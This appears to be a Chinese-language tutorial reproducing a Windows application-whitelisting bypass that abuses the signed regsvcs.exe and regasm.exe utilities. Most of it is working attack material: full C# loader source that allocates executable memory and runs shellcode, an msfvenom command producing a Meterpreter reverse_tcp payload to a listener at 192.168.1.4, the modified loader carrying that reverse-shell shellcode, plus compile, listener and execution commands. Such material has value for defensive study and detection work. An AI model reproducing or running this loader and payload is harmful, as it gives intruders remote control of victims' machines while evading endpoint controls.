1. 本文来自互联网,个人只是进行验证与复现。
  2. 详细文章链接:https://mp.weixin.qq.com/s/MCMjxPdUNdwV8is04AklLA

1.概述

1.1 介绍

Regsvcs和Regasm是Windows命令行实用程序,用于注册.NET组件对象模型(COM)程序集。两者都是由Microsoft进行数字签名的。攻击者可以使用Regsvcs和Regasm代理通过受信任的Windows实用程序执行代码。两个实用程序可用于通过使用二进制内的属性来绕过进程白名单,以指定应在注册或取消注册之前运行的代码:[ComRegisterFunction]或[ComUnregisterFunction]分别。即使进程在权限不足的情况下运行并且无法执行,也将执行具有注册和取消注册属性的代码。

1.2 执行方式

  1. regasm.exe AllTheThingsx64.dll
  2. regsvcs.exe AllTheThingsx64.dll

2. 利用

2.1 下载cs文件

下载用以生成恶意dll的cs文件

  1. https://github.com/3gstudent/Bypass-McAfee-Application-Control--Code-Execution/blob/master/regsvcs.cs

下载后的内容为:

  1. using System;
  2. using System.EnterpriseServices;
  3. using System.Runtime.InteropServices;
  5. /*
  6. Author: Casey Smith, Twitter: @subTee
  7. License: BSD 3-Clause
  8. Create Your Strong Name Key -> key.snk
  9. $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
  10. $Content = [System.Convert]::FromBase64String($key)
  11. Set-Content key.snk -Value $Content -Encoding Byte
  12. C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
  13. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll 
  14. [OR]
  15. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
  16. //Executes UnRegisterClass If you don't have permissions
  17. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll 
  18. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
  19. //This calls the UnregisterClass Method
  20. */
  21. namespace regsvcser
  22. {
  24.     public class Bypass : ServicedComponent
  25.     {
  26.         public Bypass() { Console.WriteLine("I am a basic COM Object"); }
  28.         [ComRegisterFunction] //This executes if registration is successful
  29.         public static void RegisterClass ( string key )
  30.         {
  31.             Console.WriteLine("I shouldn't really execute");
  32.             Shellcode.Exec();
  33.         }
  35.         [ComUnregisterFunction] //This executes if registration fails
  36.         public static void UnRegisterClass ( string key )
  37.         {
  38.             Console.WriteLine("I shouldn't really execute either.");
  39.             Shellcode.Exec();
  40.         }
  41.     }
  43.     public class Shellcode
  44.     {
  45.         public static void Exec()
  46.         {
  47.             // native function's compiled code
  48.             // generated with metasploit
  49.             // executes calc.exe
  50.             byte[] shellcode = new byte[193] {
  51.             0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
  52.             0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
  53.             0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
  54.             0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
  55.             0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
  56.             0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
  57.             0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
  58.             0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
  59.             0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
  60.             0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
  61.             0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
  62.             0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
  63.             0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
  67.             UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
  68.                                 MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  69.             Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
  70.             IntPtr hThread = IntPtr.Zero;
  71.             UInt32 threadId = 0;
  72.             // prepare data
  75.             IntPtr pinfo = IntPtr.Zero;
  77.             // execute native code
  79.             hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
  80.             WaitForSingleObject(hThread, 0xFFFFFFFF);
  81.             return;
  82.         }
  84.         private static UInt32 MEM_COMMIT = 0x1000;
  86.         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
  88.         [DllImport("kernel32")]
  89.         private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
  90.              UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
  93.         [DllImport("kernel32")]
  94.         private static extern IntPtr CreateThread(
  96.           UInt32 lpThreadAttributes,
  97.           UInt32 dwStackSize,
  98.           UInt32 lpStartAddress,
  99.           IntPtr param,
  100.           UInt32 dwCreationFlags,
  101.           ref UInt32 lpThreadId
  103.           );
  105.         [DllImport("kernel32")]
  106.         private static extern UInt32 WaitForSingleObject(
  108.           IntPtr hHandle,
  109.           UInt32 dwMilliseconds
  110.           );
  113.     }
  115. }

2.2 生成c#格式的Payload

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=1111 -f csharp

image.png

2.3 shellcode替换

将msf生成的shellocde替换原先文件里面的shellcode,并修改其shellcode长度,替换后的文件如下:

  1. using System;
  2. using System.EnterpriseServices;
  3. using System.Runtime.InteropServices;
  5. /*
  6. Author: Casey Smith, Twitter: @subTee
  7. License: BSD 3-Clause
  8. Create Your Strong Name Key -> key.snk
  9. $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
  10. $Content = [System.Convert]::FromBase64String($key)
  11. Set-Content key.snk -Value $Content -Encoding Byte
  12. C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
  13. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll 
  14. [OR]
  15. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
  16. //Executes UnRegisterClass If you don't have permissions
  17. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll 
  18. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
  19. //This calls the UnregisterClass Method
  20. */
  21. namespace regsvcser
  22. {
  24.     public class Bypass : ServicedComponent
  25.     {
  26.         public Bypass() { Console.WriteLine("I am a basic COM Object"); }
  28.         [ComRegisterFunction] //This executes if registration is successful
  29.         public static void RegisterClass ( string key )
  30.         {
  31.             Console.WriteLine("I shouldn't really execute");
  32.             Shellcode.Exec();
  33.         }
  35.         [ComUnregisterFunction] //This executes if registration fails
  36.         public static void UnRegisterClass ( string key )
  37.         {
  38.             Console.WriteLine("I shouldn't really execute either.");
  39.             Shellcode.Exec();
  40.         }
  41.     }
  43.     public class Shellcode
  44.     {
  45.         public static void Exec()
  46.         {
  47.             // native function's compiled code
  48.             // generated with metasploit
  49.             // executes calc.exe
  50.             byte[] shellcode = new byte[354] {
  51. 0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,
  52. 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x0f,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,
  53. 0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
  54. 0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x57,0x8b,0x40,0x78,
  55. 0x85,0xc0,0x74,0x4c,0x01,0xd0,0x50,0x8b,0x58,0x20,0x01,0xd3,0x8b,0x48,0x18,
  56. 0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1,
  57. 0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
  58. 0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
  59. 0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
  60. 0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
  61. 0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
  62. 0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
  63. 0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x01,0x04,0x68,0x02,
  64. 0x00,0x04,0x57,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
  65. 0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
  66. 0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
  67. 0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
  68. 0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
  69. 0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
  70. 0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
  71. 0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
  72. 0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
  73. 0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
  74. 0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5};
  78.             UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
  79.                                 MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  80.             Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
  81.             IntPtr hThread = IntPtr.Zero;
  82.             UInt32 threadId = 0;
  83.             // prepare data
  86.             IntPtr pinfo = IntPtr.Zero;
  88.             // execute native code
  90.             hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
  91.             WaitForSingleObject(hThread, 0xFFFFFFFF);
  92.             return;
  93.         }
  95.         private static UInt32 MEM_COMMIT = 0x1000;
  97.         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
  99.         [DllImport("kernel32")]
  100.         private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
  101.              UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
  104.         [DllImport("kernel32")]
  105.         private static extern IntPtr CreateThread(
  107.           UInt32 lpThreadAttributes,
  108.           UInt32 dwStackSize,
  109.           UInt32 lpStartAddress,
  110.           IntPtr param,
  111.           UInt32 dwCreationFlags,
  112.           ref UInt32 lpThreadId
  114.           );
  116.         [DllImport("kernel32")]
  117.         private static extern UInt32 WaitForSingleObject(
  119.           IntPtr hHandle,
  120.           UInt32 dwMilliseconds
  121.           );
  124.     }
  126. }

2.4 生成签名文件

利用sn.exe来进行签名,sn.exe工具在安装vs以后会自动安装,使用语法为

  1. sn.exe -k key.snk

image.png
看一下key.snk文件内容:
image.png

2.5 生成dll文件

利用C:\Windows\Microsoft.NET\Framework\v4.0.30319文件夹中的csc.exe程序可以将cs文件生成为dll文件。
编译dll

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs

image.png
生成该文件成功
image.png

2.6 监听

  1. handler -H 192.168.1.4 -P 1111 -p windows/meterpreter/reverse_tcp

image.png

2.7 执行dll上线

2.7.1 利用regsvcs.exe进行上线

  1. C:\Users\Administrator\Desktop>c:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 1.dll

image.png
image.png

2.7.2 利用Regasm.exe上线

  1. C:\Users\Administrator\Desktop>c:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe 1.dll

image.png
image.png